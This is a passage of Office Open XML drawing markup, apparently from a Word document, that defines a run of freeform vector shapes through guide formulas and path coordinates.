                                  <a:gd name="T27" fmla="*/ 48 h 95"/>
                                  <a:gd name="T28" fmla="*/ 0 w 57"/>
                                  <a:gd name="T29" fmla="*/ 30 h 95"/>
                                  <a:gd name="T30" fmla="*/ 21 w 57"/>
                                  <a:gd name="T31" fmla="*/ 9 h 95"/>
                                  <a:gd name="T32" fmla="*/ 26 w 57"/>
                                  <a:gd name="T33" fmla="*/ 0 h 95"/>
                                  <a:gd name="T34" fmla="*/ 41 w 57"/>
                                  <a:gd name="T35" fmla="*/ 0 h 95"/>
                                  <a:gd name="T36" fmla="*/ 52 w 57"/>
                                  <a:gd name="T37" fmla="*/ 4 h 95"/>
                                  <a:gd name="T38" fmla="*/ 57 w 57"/>
                                  <a:gd name="T39" fmla="*/ 13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95">
                                    <a:moveTo>
                                      <a:pt x="57" y="13"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="47" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="69"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="82"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="87"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="91"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="95"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="91"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="69"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="9"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57"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43" name="Freeform 297"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="8047" y="3018"/>
                                <a:ext cx="62" cy="78"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 62 w 62"/>
                                  <a:gd name="T1" fmla="*/ 22 h 78"/>
                                  <a:gd name="T2" fmla="*/ 62 w 62"/>
                                  <a:gd name="T3" fmla="*/ 30 h 78"/>
                                  <a:gd name="T4" fmla="*/ 51 w 62"/>
                                  <a:gd name="T5" fmla="*/ 30 h 78"/>
                                  <a:gd name="T6" fmla="*/ 46 w 62"/>
                                  <a:gd name="T7" fmla="*/ 30 h 78"/>
                                  <a:gd name="T8" fmla="*/ 36 w 62"/>
                                  <a:gd name="T9" fmla="*/ 22 h 78"/>
                                  <a:gd name="T10" fmla="*/ 31 w 62"/>
                                  <a:gd name="T11" fmla="*/ 17 h 78"/>
                                  <a:gd name="T12" fmla="*/ 25 w 62"/>
                                  <a:gd name="T13" fmla="*/ 17 h 78"/>
                                  <a:gd name="T14" fmla="*/ 20 w 62"/>
                                  <a:gd name="T15" fmla="*/ 26 h 78"/>
                                  <a:gd name="T16" fmla="*/ 25 w 62"/>
                                  <a:gd name="T17" fmla="*/ 39 h 78"/>
                                  <a:gd name="T18" fmla="*/ 41 w 62"/>
                                  <a:gd name="T19" fmla="*/ 52 h 78"/>
                                  <a:gd name="T20" fmla="*/ 56 w 62"/>
                                  <a:gd name="T21" fmla="*/ 61 h 78"/>
                                  <a:gd name="T22" fmla="*/ 62 w 62"/>
                                  <a:gd name="T23" fmla="*/ 78 h 78"/>
                                  <a:gd name="T24" fmla="*/ 46 w 62"/>
                                  <a:gd name="T25" fmla="*/ 78 h 78"/>
                                  <a:gd name="T26" fmla="*/ 31 w 62"/>
                                  <a:gd name="T27" fmla="*/ 69 h 78"/>
                                  <a:gd name="T28" fmla="*/ 10 w 62"/>
                                  <a:gd name="T29" fmla="*/ 43 h 78"/>
                                  <a:gd name="T30" fmla="*/ 0 w 62"/>
                                  <a:gd name="T31" fmla="*/ 26 h 78"/>
                                  <a:gd name="T32" fmla="*/ 0 w 62"/>
                                  <a:gd name="T33" fmla="*/ 17 h 78"/>
                                  <a:gd name="T34" fmla="*/ 10 w 62"/>
                                  <a:gd name="T35" fmla="*/ 9 h 78"/>
                                  <a:gd name="T36" fmla="*/ 20 w 62"/>
                                  <a:gd name="T37" fmla="*/ 0 h 78"/>
                                  <a:gd name="T38" fmla="*/ 36 w 62"/>
                                  <a:gd name="T39" fmla="*/ 0 h 78"/>
                                  <a:gd name="T40" fmla="*/ 51 w 62"/>
                                  <a:gd name="T41" fmla="*/ 9 h 78"/>
                                  <a:gd name="T42" fmla="*/ 62 w 62"/>
                                  <a:gd name="T43" fmla="*/ 2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8">
                                    <a:moveTo>
                                      <a:pt x="62" y="22"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="51" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="25" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="25" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="56" y="61"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="69"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="9"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="51" y="9"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62"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44" name="Freeform 298"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="9065" y="3009"/>
                                <a:ext cx="36" cy="26"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 36 w 36"/>
                                  <a:gd name="T1" fmla="*/ 18 h 26"/>
                                  <a:gd name="T2" fmla="*/ 36 w 36"/>
                                  <a:gd name="T3" fmla="*/ 22 h 26"/>
                                  <a:gd name="T4" fmla="*/ 31 w 36"/>
                                  <a:gd name="T5" fmla="*/ 26 h 26"/>
                                  <a:gd name="T6" fmla="*/ 15 w 36"/>
                                  <a:gd name="T7" fmla="*/ 22 h 26"/>
                                  <a:gd name="T8" fmla="*/ 0 w 36"/>
                                  <a:gd name="T9" fmla="*/ 9 h 26"/>
                                  <a:gd name="T10" fmla="*/ 0 w 36"/>
                                  <a:gd name="T11" fmla="*/ 9 h 26"/>
                                  <a:gd name="T12" fmla="*/ 0 w 36"/>
                                  <a:gd name="T13" fmla="*/ 0 h 26"/>
                                  <a:gd name="T14" fmla="*/ 21 w 36"/>
                                  <a:gd name="T15" fmla="*/ 9 h 26"/>
                                  <a:gd name="T16" fmla="*/ 36 w 36"/>
                                  <a:gd name="T17"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26">
                                    <a:moveTo>
                                      <a:pt x="36" y="18"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="9"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="9"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="1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99"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7463" y="3031"/>
                                <a:ext cx="175" cy="65"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 56 w 175"/>
                                  <a:gd name="T1" fmla="*/ 13 h 65"/>
                                  <a:gd name="T2" fmla="*/ 56 w 175"/>
                                  <a:gd name="T3" fmla="*/ 4 h 65"/>
                                  <a:gd name="T4" fmla="*/ 113 w 175"/>
                                  <a:gd name="T5" fmla="*/ 17 h 65"/>
                                  <a:gd name="T6" fmla="*/ 139 w 175"/>
                                  <a:gd name="T7" fmla="*/ 26 h 65"/>
                                  <a:gd name="T8" fmla="*/ 170 w 175"/>
                                  <a:gd name="T9" fmla="*/ 26 h 65"/>
                                  <a:gd name="T10" fmla="*/ 175 w 175"/>
                                  <a:gd name="T11" fmla="*/ 30 h 65"/>
                                  <a:gd name="T12" fmla="*/ 170 w 175"/>
                                  <a:gd name="T13" fmla="*/ 39 h 65"/>
                                  <a:gd name="T14" fmla="*/ 160 w 175"/>
                                  <a:gd name="T15" fmla="*/ 48 h 65"/>
                                  <a:gd name="T16" fmla="*/ 139 w 175"/>
                                  <a:gd name="T17" fmla="*/ 56 h 65"/>
                                  <a:gd name="T18" fmla="*/ 108 w 175"/>
                                  <a:gd name="T19" fmla="*/ 61 h 65"/>
                                  <a:gd name="T20" fmla="*/ 72 w 175"/>
                                  <a:gd name="T21" fmla="*/ 61 h 65"/>
                                  <a:gd name="T22" fmla="*/ 41 w 175"/>
                                  <a:gd name="T23" fmla="*/ 65 h 65"/>
                                  <a:gd name="T24" fmla="*/ 31 w 175"/>
                                  <a:gd name="T25" fmla="*/ 65 h 65"/>
                                  <a:gd name="T26" fmla="*/ 20 w 175"/>
                                  <a:gd name="T27" fmla="*/ 61 h 65"/>
                                  <a:gd name="T28" fmla="*/ 20 w 175"/>
                                  <a:gd name="T29" fmla="*/ 52 h 65"/>
                                  <a:gd name="T30" fmla="*/ 51 w 175"/>
                                  <a:gd name="T31" fmla="*/ 52 h 65"/>
                                  <a:gd name="T32" fmla="*/ 67 w 175"/>
                                  <a:gd name="T33" fmla="*/ 48 h 65"/>
                                  <a:gd name="T34" fmla="*/ 77 w 175"/>
                                  <a:gd name="T35" fmla="*/ 48 h 65"/>
                                  <a:gd name="T36" fmla="*/ 82 w 175"/>
                                  <a:gd name="T37" fmla="*/ 30 h 65"/>
                                  <a:gd name="T38" fmla="*/ 82 w 175"/>
                                  <a:gd name="T39" fmla="*/ 26 h 65"/>
                                  <a:gd name="T40" fmla="*/ 72 w 175"/>
                                  <a:gd name="T41" fmla="*/ 22 h 65"/>
                                  <a:gd name="T42" fmla="*/ 31 w 175"/>
                                  <a:gd name="T43" fmla="*/ 17 h 65"/>
                                  <a:gd name="T44" fmla="*/ 0 w 175"/>
                                  <a:gd name="T45" fmla="*/ 4 h 65"/>
                                  <a:gd name="T46" fmla="*/ 5 w 175"/>
                                  <a:gd name="T47" fmla="*/ 0 h 65"/>
                                  <a:gd name="T48" fmla="*/ 31 w 175"/>
                                  <a:gd name="T49" fmla="*/ 9 h 65"/>
                                  <a:gd name="T50" fmla="*/ 46 w 175"/>
                                  <a:gd name="T51" fmla="*/ 17 h 65"/>
                                  <a:gd name="T52" fmla="*/ 56 w 175"/>
                                  <a:gd name="T53"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5" h="65">
                                    <a:moveTo>
                                      <a:pt x="56" y="13"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="56" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="113" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="139" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="170" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="175" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="170" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="160" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="139" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="108" y="61"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="61"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="61"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="51" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="77" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="82" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="82" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="9"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="56" y="13"/>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300"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="8920" y="3031"/>
                                <a:ext cx="31" cy="26"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 31 w 31"/>
                                  <a:gd name="T1" fmla="*/ 13 h 26"/>
                                  <a:gd name="T2" fmla="*/ 26 w 31"/>
                                  <a:gd name="T3" fmla="*/ 26 h 26"/>
                                  <a:gd name="T4" fmla="*/ 21 w 31"/>
                                  <a:gd name="T5" fmla="*/ 26 h 26"/>
                                  <a:gd name="T6" fmla="*/ 16 w 31"/>
                                  <a:gd name="T7" fmla="*/ 26 h 26"/>
                                  <a:gd name="T8" fmla="*/ 5 w 31"/>
                                  <a:gd name="T9" fmla="*/ 22 h 26"/>
                                  <a:gd name="T10" fmla="*/ 0 w 31"/>
                                  <a:gd name="T11" fmla="*/ 17 h 26"/>
                                  <a:gd name="T12" fmla="*/ 0 w 31"/>
                                  <a:gd name="T13" fmla="*/ 9 h 26"/>
                                  <a:gd name="T14" fmla="*/ 11 w 31"/>
                                  <a:gd name="T15" fmla="*/ 0 h 26"/>
                                  <a:gd name="T16" fmla="*/ 26 w 31"/>
                                  <a:gd name="T17" fmla="*/ 4 h 26"/>
                                  <a:gd name="T18" fmla="*/ 31 w 31"/>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6">
                                    <a:moveTo>
                                      <a:pt x="31" y="13"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="9"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="11" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="3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301"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="9106" y="3035"/>
                                <a:ext cx="36" cy="22"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 36 w 36"/>
                                  <a:gd name="T1" fmla="*/ 13 h 22"/>
                                  <a:gd name="T2" fmla="*/ 31 w 36"/>
                                  <a:gd name="T3" fmla="*/ 22 h 22"/>
                                  <a:gd name="T4" fmla="*/ 21 w 36"/>
                                  <a:gd name="T5" fmla="*/ 22 h 22"/>
                                  <a:gd name="T6" fmla="*/ 11 w 36"/>
                                  <a:gd name="T7" fmla="*/ 22 h 22"/>
                                  <a:gd name="T8" fmla="*/ 0 w 36"/>
                                  <a:gd name="T9" fmla="*/ 13 h 22"/>
                                  <a:gd name="T10" fmla="*/ 21 w 36"/>
                                  <a:gd name="T11" fmla="*/ 0 h 22"/>
                                  <a:gd name="T12" fmla="*/ 31 w 36"/>
                                  <a:gd name="T13" fmla="*/ 5 h 22"/>
                                  <a:gd name="T14" fmla="*/ 36 w 36"/>
                                  <a:gd name="T15" fmla="*/ 13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 h="22">
                                    <a:moveTo>
                                      <a:pt x="36" y="13"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="11" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="5"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="3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302"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="9029" y="3035"/>
                                <a:ext cx="46" cy="26"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 46 w 46"/>
                                  <a:gd name="T1" fmla="*/ 13 h 26"/>
                                  <a:gd name="T2" fmla="*/ 31 w 46"/>
                                  <a:gd name="T3" fmla="*/ 22 h 26"/>
                                  <a:gd name="T4" fmla="*/ 20 w 46"/>
                                  <a:gd name="T5" fmla="*/ 26 h 26"/>
                                  <a:gd name="T6" fmla="*/ 15 w 46"/>
                                  <a:gd name="T7" fmla="*/ 26 h 26"/>
                                  <a:gd name="T8" fmla="*/ 5 w 46"/>
                                  <a:gd name="T9" fmla="*/ 18 h 26"/>
                                  <a:gd name="T10" fmla="*/ 0 w 46"/>
                                  <a:gd name="T11" fmla="*/ 9 h 26"/>
                                  <a:gd name="T12" fmla="*/ 15 w 46"/>
                                  <a:gd name="T13" fmla="*/ 0 h 26"/>
                                  <a:gd name="T14" fmla="*/ 20 w 46"/>
                                  <a:gd name="T15" fmla="*/ 0 h 26"/>
                                  <a:gd name="T16" fmla="*/ 36 w 46"/>
                                  <a:gd name="T17" fmla="*/ 5 h 26"/>
                                  <a:gd name="T18" fmla="*/ 46 w 46"/>
                                  <a:gd name="T19" fmla="*/ 13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26">
                                    <a:moveTo>
                                      <a:pt x="46" y="13"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="18"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="9"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="5"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46"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303"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="9173" y="3040"/>
                                <a:ext cx="21" cy="13"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 21 w 21"/>
                                  <a:gd name="T1" fmla="*/ 4 h 13"/>
                                  <a:gd name="T2" fmla="*/ 16 w 21"/>
                                  <a:gd name="T3" fmla="*/ 8 h 13"/>
                                  <a:gd name="T4" fmla="*/ 16 w 21"/>
                                  <a:gd name="T5" fmla="*/ 13 h 13"/>
                                  <a:gd name="T6" fmla="*/ 6 w 21"/>
                                  <a:gd name="T7" fmla="*/ 8 h 13"/>
                                  <a:gd name="T8" fmla="*/ 0 w 21"/>
                                  <a:gd name="T9" fmla="*/ 4 h 13"/>
                                  <a:gd name="T10" fmla="*/ 6 w 21"/>
                                  <a:gd name="T11" fmla="*/ 0 h 13"/>
                                  <a:gd name="T12" fmla="*/ 16 w 21"/>
                                  <a:gd name="T13" fmla="*/ 0 h 13"/>
                                  <a:gd name="T14" fmla="*/ 21 w 21"/>
                                  <a:gd name="T15" fmla="*/ 4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13">
                                    <a:moveTo>
                                      <a:pt x="21" y="4"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="8"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="6" y="8"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="6" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="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304"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7468" y="3057"/>
                                <a:ext cx="26" cy="9"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 26 w 26"/>
                                  <a:gd name="T1" fmla="*/ 4 h 9"/>
                                  <a:gd name="T2" fmla="*/ 20 w 26"/>
                                  <a:gd name="T3" fmla="*/ 9 h 9"/>
                                  <a:gd name="T4" fmla="*/ 5 w 26"/>
                                  <a:gd name="T5" fmla="*/ 9 h 9"/>
                                  <a:gd name="T6" fmla="*/ 0 w 26"/>
                                  <a:gd name="T7" fmla="*/ 0 h 9"/>
                                  <a:gd name="T8" fmla="*/ 15 w 26"/>
                                  <a:gd name="T9" fmla="*/ 0 h 9"/>
                                  <a:gd name="T10" fmla="*/ 26 w 26"/>
                                  <a:gd name="T11" fmla="*/ 4 h 9"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst>
                                  <a:cxn ang="0">
                                    <a:pos x="T0" y="T1"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T2" y="T3"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T4" y="T5"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T6" y="T7"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T8" y="T9"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T10" y="T11"/>
                                  </a:cxn>
                                </a:cxnLst>
                                <a:rect l="0" t="0" r="r" b="b"/>
                                <a:pathLst>
                                  <a:path w="26" h="9">
                                    <a:moveTo>
                                      <a:pt x="26" y="4"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="9"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="9"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="4"/>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305"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="9065" y="3061"/>
                                <a:ext cx="31" cy="18"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 31 w 31"/>
                                  <a:gd name="T1" fmla="*/ 9 h 18"/>
                                  <a:gd name="T2" fmla="*/ 15 w 31"/>
                                  <a:gd name="T3" fmla="*/ 18 h 18"/>
                                  <a:gd name="T4" fmla="*/ 5 w 31"/>
                                  <a:gd name="T5" fmla="*/ 18 h 18"/>
                                  <a:gd name="T6" fmla="*/ 0 w 31"/>
                                  <a:gd name="T7" fmla="*/ 18 h 18"/>
                                  <a:gd name="T8" fmla="*/ 15 w 31"/>
                                  <a:gd name="T9" fmla="*/ 0 h 18"/>
                                  <a:gd name="T10" fmla="*/ 26 w 31"/>
                                  <a:gd name="T11" fmla="*/ 0 h 18"/>
                                  <a:gd name="T12" fmla="*/ 31 w 31"/>
                                  <a:gd name="T13" fmla="*/ 0 h 18"/>
                                  <a:gd name="T14" fmla="*/ 31 w 31"/>
                                  <a:gd name="T15" fmla="*/ 9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18">
                                    <a:moveTo>
                                      <a:pt x="31" y="9"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="18"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="18"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="18"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="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306"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="8005" y="3096"/>
                                <a:ext cx="119" cy="52"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 114 w 119"/>
                                  <a:gd name="T1" fmla="*/ 22 h 52"/>
                                  <a:gd name="T2" fmla="*/ 119 w 119"/>
                                  <a:gd name="T3" fmla="*/ 26 h 52"/>
                                  <a:gd name="T4" fmla="*/ 114 w 119"/>
                                  <a:gd name="T5" fmla="*/ 30 h 52"/>
                                  <a:gd name="T6" fmla="*/ 104 w 119"/>
                                  <a:gd name="T7" fmla="*/ 30 h 52"/>
                                  <a:gd name="T8" fmla="*/ 93 w 119"/>
                                  <a:gd name="T9" fmla="*/ 26 h 52"/>
                                  <a:gd name="T10" fmla="*/ 67 w 119"/>
                                  <a:gd name="T11" fmla="*/ 17 h 52"/>
                                  <a:gd name="T12" fmla="*/ 42 w 119"/>
                                  <a:gd name="T13" fmla="*/ 13 h 52"/>
                                  <a:gd name="T14" fmla="*/ 31 w 119"/>
                                  <a:gd name="T15" fmla="*/ 17 h 52"/>
                                  <a:gd name="T16" fmla="*/ 26 w 119"/>
                                  <a:gd name="T17" fmla="*/ 22 h 52"/>
                                  <a:gd name="T18" fmla="*/ 31 w 119"/>
                                  <a:gd name="T19" fmla="*/ 30 h 52"/>
                                  <a:gd name="T20" fmla="*/ 42 w 119"/>
                                  <a:gd name="T21" fmla="*/ 35 h 52"/>
                                  <a:gd name="T22" fmla="*/ 52 w 119"/>
                                  <a:gd name="T23" fmla="*/ 35 h 52"/>
                                  <a:gd name="T24" fmla="*/ 57 w 119"/>
                                  <a:gd name="T25" fmla="*/ 35 h 52"/>
                                  <a:gd name="T26" fmla="*/ 62 w 119"/>
                                  <a:gd name="T27" fmla="*/ 39 h 52"/>
                                  <a:gd name="T28" fmla="*/ 52 w 119"/>
                                  <a:gd name="T29" fmla="*/ 48 h 52"/>
